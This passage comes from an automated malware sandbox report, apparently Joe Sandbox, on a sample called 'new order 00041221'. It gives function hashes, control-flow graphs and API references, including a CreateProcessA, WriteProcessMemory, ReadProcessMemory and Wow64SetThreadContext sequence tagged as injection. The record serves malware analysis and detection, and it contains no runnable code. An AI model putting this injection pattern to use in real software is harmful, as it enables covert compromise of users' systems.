                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ce43b2bc501ba95545fb7f9db8ff0c9f9eaa302a30b502067685940e85d61de
                                            • Instruction ID: 07dc6a8201bf8154e53d17f9418836d4ba044d368b49924671638ae092e71a97
                                            • Opcode Fuzzy Hash: 0ce43b2bc501ba95545fb7f9db8ff0c9f9eaa302a30b502067685940e85d61de
                                            • Instruction Fuzzy Hash: 0E3143B0D096888FE719CFA6C9143DEBFB6AFCA300F08C0ABD409A6265DB740945CF51
                                            Function 06B70040 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6af1995c5a74cdd87594ec218d2aac71372cbf2a1db4fccb5314942b53ff41fd
                                            • Instruction ID: 3c920edbcb4ae6c8fcf4a208507dd1aa65a86efe0b4a2c7bee3c3b62d8592718
                                            • Opcode Fuzzy Hash: 6af1995c5a74cdd87594ec218d2aac71372cbf2a1db4fccb5314942b53ff41fd
                                            • Instruction Fuzzy Hash: DA21E8B1D046189BEB58CFABC9543EEFAF7AFC8300F14C06AD419A6264DB740A45CF90
                                            Function 04C82D49 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04C82DD6
                                            • GetCurrentThread.KERNEL32 ref: 04C82E13
                                            • GetCurrentProcess.KERNEL32 ref: 04C82E50
                                            • GetCurrentThreadId.KERNEL32 ref: 04C82EA9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 38a74f55583355d7edc931e8ce3dc2902a4a15ee8749027972df96e0b0221a31
                                            • Instruction ID: 9994a7072f0f616d9df05c6a378ce36cfa3e78be124af565be04ceb928f067cc
                                            • Opcode Fuzzy Hash: 38a74f55583355d7edc931e8ce3dc2902a4a15ee8749027972df96e0b0221a31
                                            • Instruction Fuzzy Hash: F65175B0D00349CFDB14DFAAC548B9EBBF2EB48305F2084AAE119A7290DB746945CF65
                                            Function 04C82D58 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 04C82DD6
                                            • GetCurrentThread.KERNEL32 ref: 04C82E13
                                            • GetCurrentProcess.KERNEL32 ref: 04C82E50
                                            • GetCurrentThreadId.KERNEL32 ref: 04C82EA9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 9bad9e6791610dfa4555e5414dbc214d8add22dc6d1e304dd06ceed6f6f37210
                                            • Instruction ID: c856d43181d6ff538a4fb9bd4908c084e9af42a1514cff928dea37c5e21af524
                                            • Opcode Fuzzy Hash: 9bad9e6791610dfa4555e5414dbc214d8add22dc6d1e304dd06ceed6f6f37210
                                            • Instruction Fuzzy Hash: E05166B0D00309CFDB14EFAAD548B9EBBF2EB48315F20846DE119A7290DB746945CF65
                                            Function 04C873B1 Relevance: 1.8, APIs: 1, Instructions: 297COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1157 4c873b1-4c874d3 1160 4c874f9-4c87576 1157->1160 1161 4c874d5-4c874f0 call 4c86efc 1157->1161 1166 4c87578-4c8757e 1160->1166 1167 4c87581-4c87588 1160->1167 1164 4c874f5-4c874f6 1161->1164 1166->1167 1168 4c8758a-4c87590 1167->1168 1169 4c87593-4c87632 CreateWindowExW 1167->1169 1168->1169 1171 4c8763b-4c87673 1169->1171 1172 4c87634-4c8763a 1169->1172 1176 4c87680 1171->1176 1177 4c87675-4c87678 1171->1177 1172->1171 1178 4c87681 1176->1178 1177->1176 1178->1178
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C87622
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c8a41c9f75713ba63a9f6dc7fe4644aac4a1a382b9a70f0c40711b7789912e49
                                            • Instruction ID: 18bdd4fd84d1565c24a783dfb0df16a5eddf488da248e30f0e78984e98d397b8
                                            • Opcode Fuzzy Hash: c8a41c9f75713ba63a9f6dc7fe4644aac4a1a382b9a70f0c40711b7789912e49
                                            • Instruction Fuzzy Hash: 2D919EB1C0A3899FDB02CFA5C8916CDBFB1EF1A314F29819AE4549B2A2D3355847CB51
                                            Function 06B757D4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1179 6b757d4-6b757de 1180 6b757e4-6b75875 1179->1180 1181 6b757e0-6b757e3 1179->1181 1183 6b75877-6b75881 1180->1183 1184 6b758ae-6b758ce 1180->1184 1181->1180 1183->1184 1185 6b75883-6b75885 1183->1185 1189 6b75907-6b75936 1184->1189 1190 6b758d0-6b758da 1184->1190 1187 6b75887-6b75891 1185->1187 1188 6b758a8-6b758ab 1185->1188 1191 6b75895-6b758a4 1187->1191 1192 6b75893 1187->1192 1188->1184 1200 6b7596f-6b75a29 CreateProcessA 1189->1200 1201 6b75938-6b75942 1189->1201 1190->1189 1193 6b758dc-6b758de 1190->1193 1191->1191 1194 6b758a6 1191->1194 1192->1191 1195 6b75901-6b75904 1193->1195 1196 6b758e0-6b758ea 1193->1196 1194->1188 1195->1189 1198 6b758ee-6b758fd 1196->1198 1199 6b758ec 1196->1199 1198->1198 1202 6b758ff 1198->1202 1199->1198 1212 6b75a32-6b75ab8 1200->1212 1213 6b75a2b-6b75a31 1200->1213 1201->1200 1203 6b75944-6b75946 1201->1203 1202->1195 1205 6b75969-6b7596c 1203->1205 1206 6b75948-6b75952 1203->1206 1205->1200 1207 6b75956-6b75965 1206->1207 1208 6b75954 1206->1208 1207->1207 1209 6b75967 1207->1209 1208->1207 1209->1205 1223 6b75aba-6b75abe 1212->1223 1224 6b75ac8-6b75acc 1212->1224 1213->1212 1223->1224 1227 6b75ac0 1223->1227 1225 6b75ace-6b75ad2 1224->1225 1226 6b75adc-6b75ae0 1224->1226 1225->1226 1228 6b75ad4 1225->1228 1229 6b75ae2-6b75ae6 1226->1229 1230 6b75af0-6b75af4 1226->1230 1227->1224 1228->1226 1229->1230 1231 6b75ae8 1229->1231 1232 6b75b06-6b75b0d 1230->1232 1233 6b75af6-6b75afc 1230->1233 1231->1230 1234 6b75b24 1232->1234 1235 6b75b0f-6b75b1e 1232->1235 1233->1232 1236 6b75b25 1234->1236 1235->1234 1236->1236
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B75A16
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 215eba0c0362377e616ea2383d85fc95e64ed0ef26fd121534bfc49747b6d768
                                            • Instruction ID: 930ce2baa7cd8594f6dc43e253621c7fe0eb2312012aebef1854c6cd02604a35
                                            • Opcode Fuzzy Hash: 215eba0c0362377e616ea2383d85fc95e64ed0ef26fd121534bfc49747b6d768
                                            • Instruction Fuzzy Hash: 42A14CB2D00319CFEB64DF68C8417ADBBB2FF48314F1485A9E819A7284DB749985CF91
                                            Function 06B757E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1238 6b757e0-6b75875 1241 6b75877-6b75881 1238->1241 1242 6b758ae-6b758ce 1238->1242 1241->1242 1243 6b75883-6b75885 1241->1243 1247 6b75907-6b75936 1242->1247 1248 6b758d0-6b758da 1242->1248 1245 6b75887-6b75891 1243->1245 1246 6b758a8-6b758ab 1243->1246 1249 6b75895-6b758a4 1245->1249 1250 6b75893 1245->1250 1246->1242 1258 6b7596f-6b75a29 CreateProcessA 1247->1258 1259 6b75938-6b75942 1247->1259 1248->1247 1251 6b758dc-6b758de 1248->1251 1249->1249 1252 6b758a6 1249->1252 1250->1249 1253 6b75901-6b75904 1251->1253 1254 6b758e0-6b758ea 1251->1254 1252->1246 1253->1247 1256 6b758ee-6b758fd 1254->1256 1257 6b758ec 1254->1257 1256->1256 1260 6b758ff 1256->1260 1257->1256 1270 6b75a32-6b75ab8 1258->1270 1271 6b75a2b-6b75a31 1258->1271 1259->1258 1261 6b75944-6b75946 1259->1261 1260->1253 1263 6b75969-6b7596c 1261->1263 1264 6b75948-6b75952 1261->1264 1263->1258 1265 6b75956-6b75965 1264->1265 1266 6b75954 1264->1266 1265->1265 1267 6b75967 1265->1267 1266->1265 1267->1263 1281 6b75aba-6b75abe 1270->1281 1282 6b75ac8-6b75acc 1270->1282 1271->1270 1281->1282 1285 6b75ac0 1281->1285 1283 6b75ace-6b75ad2 1282->1283 1284 6b75adc-6b75ae0 1282->1284 1283->1284 1286 6b75ad4 1283->1286 1287 6b75ae2-6b75ae6 1284->1287 1288 6b75af0-6b75af4 1284->1288 1285->1282 1286->1284 1287->1288 1289 6b75ae8 1287->1289 1290 6b75b06-6b75b0d 1288->1290 1291 6b75af6-6b75afc 1288->1291 1289->1288 1292 6b75b24 1290->1292 1293 6b75b0f-6b75b1e 1290->1293 1291->1290 1294 6b75b25 1292->1294 1293->1292 1294->1294
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B75A16
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: dba425e54b61d47dfe68ca6fdcf67acb3b805828cfb84994303d59b34d3ea0f2
                                            • Instruction ID: f4ea434c9e00993a39b9f6a82eb5aa09018796a5087757c530651a8a64e32fb5
                                            • Opcode Fuzzy Hash: dba425e54b61d47dfe68ca6fdcf67acb3b805828cfb84994303d59b34d3ea0f2
                                            • Instruction Fuzzy Hash: E5914DB2D00319CFEB64DF68C8417ADBBB2FF48310F1485A9E819A7284DB759985CF91
                                            Function 04C80A48 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1296 4c80a48-4c80a57 1297 4c80a59-4c80a66 call 4c803fc 1296->1297 1298 4c80a83-4c80a87 1296->1298 1303 4c80a68 1297->1303 1304 4c80a7c 1297->1304 1299 4c80a89-4c80a93 1298->1299 1300 4c80a9b-4c80adc 1298->1300 1299->1300 1307 4c80ae9-4c80af7 1300->1307 1308 4c80ade-4c80ae6 1300->1308 1351 4c80a6e call 4c80ce0 1303->1351 1352 4c80a6e call 4c80cd1 1303->1352 1304->1298 1310 4c80af9-4c80afe 1307->1310 1311 4c80b1b-4c80b1d 1307->1311 1308->1307 1309 4c80a74-4c80a76 1309->1304 1314 4c80bb8-4c80c78 1309->1314 1312 4c80b09 1310->1312 1313 4c80b00-4c80b07 call 4c80408 1310->1313 1315 4c80b20-4c80b27 1311->1315 1317 4c80b0b-4c80b19 1312->1317 1313->1317 1346 4c80c7a-4c80c7d 1314->1346 1347 4c80c80-4c80cab GetModuleHandleW 1314->1347 1318 4c80b29-4c80b31 1315->1318 1319 4c80b34-4c80b3b 1315->1319 1317->1315 1318->1319 1321 4c80b48-4c80b51 call 4c80418 1319->1321 1322 4c80b3d-4c80b45 1319->1322 1327 4c80b5e-4c80b63 1321->1327 1328 4c80b53-4c80b5b 1321->1328 1322->1321 1330 4c80b81-4c80b85 1327->1330 1331 4c80b65-4c80b6c 1327->1331 1328->1327 1353 4c80b88 call 4c80fd0 1330->1353 1354 4c80b88 call 4c80fe0 1330->1354 1331->1330 1332 4c80b6e-4c80b7e call 4c80428 call 4c80438 1331->1332 1332->1330 1335 4c80b8b-4c80b8e 1337 4c80b90-4c80bae 1335->1337 1338 4c80bb1-4c80bb7 1335->1338 1337->1338 1346->1347 1348 4c80cad-4c80cb3 1347->1348 1349 4c80cb4-4c80cc8 1347->1349 1348->1349 1351->1309 1352->1309 1353->1335 1354->1335
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04C80C9E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 986ea0cd89205ad6c8ebc55a3fa624ced483a9cde2dcfc44275985680c5ee24c
                                            • Instruction ID: a46191c36e3340839521ab291e83faf9b324d1b4a6d0b880865a4c50c2c8f0f2
                                            • Opcode Fuzzy Hash: 986ea0cd89205ad6c8ebc55a3fa624ced483a9cde2dcfc44275985680c5ee24c
                                            • Instruction Fuzzy Hash: 97712570A00B058FD724EF2AD45576ABBF2BF88318F008A2DD48AD7A50D775F949CB90
                                            Function 04C87510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1355 4c87510-4c87576 1357 4c87578-4c8757e 1355->1357 1358 4c87581-4c87588 1355->1358 1357->1358 1359 4c8758a-4c87590 1358->1359 1360 4c87593-4c875cb 1358->1360 1359->1360 1361 4c875d3-4c87632 CreateWindowExW 1360->1361 1362 4c8763b-4c87673 1361->1362 1363 4c87634-4c8763a 1361->1363 1367 4c87680 1362->1367 1368 4c87675-4c87678 1362->1368 1363->1362 1369 4c87681 1367->1369 1368->1367 1369->1369
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C87622
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 08c82d7a88f46f70ef60c24cd3c75d16aa3451abeef8694a49cc488a86ca50a5
                                            • Instruction ID: d8078db08c9184fa58f73694ed594469852d74ac9f2c4901020d7653682e925f
                                            • Opcode Fuzzy Hash: 08c82d7a88f46f70ef60c24cd3c75d16aa3451abeef8694a49cc488a86ca50a5
                                            • Instruction Fuzzy Hash: 9F41CEB1D003489FDB14DF9AC880ADEBBB6FF48314F24812EE818AB210D771A941CF90
                                            Function 00B564FC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1370 b564fc-b565c9 CreateActCtxA 1372 b565d2-b5662c 1370->1372 1373 b565cb-b565d1 1370->1373 1380 b5662e-b56631 1372->1380 1381 b5663b-b5663f 1372->1381 1373->1372 1380->1381 1382 b56641-b5664d 1381->1382 1383 b56650 1381->1383 1382->1383 1385 b56651 1383->1385 1385->1385
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B565B9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270360353.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 729cfd3a787217ed71ac513f3e4d88b4057ce5a050416f01923c772c33b6ae34
                                            • Instruction ID: c8f996434127d36fb360db795b1fd8d68cf87af6b8b948b0eae14c2c4219de75
                                            • Opcode Fuzzy Hash: 729cfd3a787217ed71ac513f3e4d88b4057ce5a050416f01923c772c33b6ae34
                                            • Instruction Fuzzy Hash: 4B41B271C00719CBEB24DFA9C844BDEBBF1BF48304F6081AAD409AB255DB75594ACF50
                                            Function 04C8704C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1386 4c8704c-4c89b1c 1390 4c89bcc-4c89bec call 4c86f24 1386->1390 1391 4c89b22-4c89b27 1386->1391 1398 4c89bef-4c89bfc 1390->1398 1393 4c89b29-4c89b60 1391->1393 1394 4c89b7a-4c89bb2 CallWindowProcW 1391->1394 1400 4c89b69-4c89b78 1393->1400 1401 4c89b62-4c89b68 1393->1401 1396 4c89bbb-4c89bca 1394->1396 1397 4c89bb4-4c89bba 1394->1397 1396->1398 1397->1396 1400->1398 1401->1400
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04C89BA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: c29f6489932ea8d4347eeacfbda5a624af7b0232c63826844577a23127c66af5
                                            • Instruction ID: 3dd602c294f8ad9fbe291f5206111299388bd98f8b48064353e99466a8c9fadf
                                            • Opcode Fuzzy Hash: c29f6489932ea8d4347eeacfbda5a624af7b0232c63826844577a23127c66af5
                                            • Instruction Fuzzy Hash: 964138B4A00305CFDB14DF45C488AAABBF6FB88318F24845DE519AB321D374A941CBA0
                                            Function 00B54CF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1404 b54cf8-b565c9 CreateActCtxA 1407 b565d2-b5662c 1404->1407 1408 b565cb-b565d1 1404->1408 1415 b5662e-b56631 1407->1415 1416 b5663b-b5663f 1407->1416 1408->1407 1415->1416 1417 b56641-b5664d 1416->1417 1418 b56650 1416->1418 1417->1418 1420 b56651 1418->1420 1420->1420
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B565B9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270360353.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: f205db7d1f36674b53bfab86a4076142db418b2a829305b3b46495d5fbedcf17
                                            • Instruction ID: 2241278a629f1f95d06859be5fe1eee423d8d644d2f4e9b65c36cb8de28679ba
                                            • Opcode Fuzzy Hash: f205db7d1f36674b53bfab86a4076142db418b2a829305b3b46495d5fbedcf17
                                            • Instruction Fuzzy Hash: 2B41E170C0071DCBEB24CFA9C844B9EBBF1BF48304F6081AAD409AB251DB75694ACF90
                                            Function 06B75550 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1421 6b75550-6b755a6 1423 6b755b6-6b755f5 WriteProcessMemory 1421->1423 1424 6b755a8-6b755b4 1421->1424 1426 6b755f7-6b755fd 1423->1426 1427 6b755fe-6b7562e 1423->1427 1424->1423 1426->1427
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B755E8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 52cc12ecf49b1387cb93f12820ac67f38e871947e4c8879e17f3e6bfbc7b7221
                                            • Instruction ID: aabe6e04d42cef22e64c8e77b85ca6120fadd594964020158db860d3950d1a46
                                            • Opcode Fuzzy Hash: 52cc12ecf49b1387cb93f12820ac67f38e871947e4c8879e17f3e6bfbc7b7221
                                            • Instruction Fuzzy Hash: 74215A76D003499FDB10CFA9C885BEEBBF1FF48310F14852AE918A7250CB789941CBA0
                                            Function 06B75558 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1532 6b75558-6b755a6 1534 6b755b6-6b755f5 WriteProcessMemory 1532->1534 1535 6b755a8-6b755b4 1532->1535 1537 6b755f7-6b755fd 1534->1537 1538 6b755fe-6b7562e 1534->1538 1535->1534 1537->1538
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B755E8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 50c197b655c7daf24a95a3dac508b8f83694de8d15d5b9e8e3d2732a1011c61f
                                            • Instruction ID: ff0b77f4c0b167756ab58e2811fe8b14b4e5d07314e542fe0102f509bef61261
                                            • Opcode Fuzzy Hash: 50c197b655c7daf24a95a3dac508b8f83694de8d15d5b9e8e3d2732a1011c61f
                                            • Instruction Fuzzy Hash: 97213B71D003499FDB10DFA9C845BDEBBF5FF48310F108529E918A7240CB799941CBA4
                                            Function 06B75641 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1552 6b75641-6b756d5 ReadProcessMemory 1555 6b756d7-6b756dd 1552->1555 1556 6b756de-6b7570e 1552->1556 1555->1556
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B756C8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: fddd6e2fdb56585f8a06332f1c6021d80d9f64e8402e88ba3b0ba377c856214f
                                            • Instruction ID: 665c29f4ac88cf241206a3ea36634f8463d602a709d6d96eb10e173e5935007e
                                            • Opcode Fuzzy Hash: fddd6e2fdb56585f8a06332f1c6021d80d9f64e8402e88ba3b0ba377c856214f
                                            • Instruction Fuzzy Hash: 38214C75C003499FDB10DF99C841BEEBBF1FF48310F108429E518A7250CB359941DBA5
                                            Function 06B753B9 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1542 6b753b9-6b7540b 1544 6b7540d-6b75419 1542->1544 1545 6b7541b-6b7544b Wow64SetThreadContext 1542->1545 1544->1545 1547 6b75454-6b75484 1545->1547 1548 6b7544d-6b75453 1545->1548 1548->1547
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7543E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1ee511f68af215dc54db0860342f7cd3fcb8894a992814aecec78bc12751f308
                                            • Instruction ID: c87949742cbaa1a40981bbe3eed757fbafbea8c6d0ceaee755452ea2caff0c6b
                                            • Opcode Fuzzy Hash: 1ee511f68af215dc54db0860342f7cd3fcb8894a992814aecec78bc12751f308
                                            • Instruction Fuzzy Hash: 2E217C71D003098FDB20DFAAC485BEEBBF0EF48320F148429D559A7240CB789945CFA1
                                            Function 04C82F98 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C83027
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 278eec3cebc45e1abdc1ba2dc83a0ebc22b4aa10db741b045e298ca0b7222bbb
                                            • Instruction ID: c6b5017c7d036f5ab0407a42be071ca4b56d8e1f1ab57bc5a91d9d2afb03d266
                                            • Opcode Fuzzy Hash: 278eec3cebc45e1abdc1ba2dc83a0ebc22b4aa10db741b045e298ca0b7222bbb
                                            • Instruction Fuzzy Hash: 062105B5C002489FDB11CFAAD884AEEFFF5EB48310F14845AE954A7250C379A950CFA5
                                            Function 06B75648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B756C8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: ff20f28bf5d9cedff5daf311e4c426373151664282520900bc8c78c2394825a3
                                            • Instruction ID: 8038ddc29f0e965a00d781f3f3f57ef3b2678642c8f7ccfd92298acccb5f0cc6
                                            • Opcode Fuzzy Hash: ff20f28bf5d9cedff5daf311e4c426373151664282520900bc8c78c2394825a3
                                            • Instruction Fuzzy Hash: B22128B1C003499FDB10DFAAC841BEEBBF5FF48310F508829E918A7250CB399941DBA4
                                            Function 06B753C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7543E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d147ea65c0578cc4e8ee26ef4c08c68da3c362ed8635ccded174d685da1a13b3
                                            • Instruction ID: f5e2ae2bd94fac09a1328e1286ac33c37e44d2fb44ad58d07fd3e1601f03a483
                                            • Opcode Fuzzy Hash: d147ea65c0578cc4e8ee26ef4c08c68da3c362ed8635ccded174d685da1a13b3
                                            • Instruction Fuzzy Hash: EF212971D003098FDB20DFAAC4857EEBBF4EF48324F548429D559A7240CB789945CFA5
                                            Function 04C82FA0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C83027
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
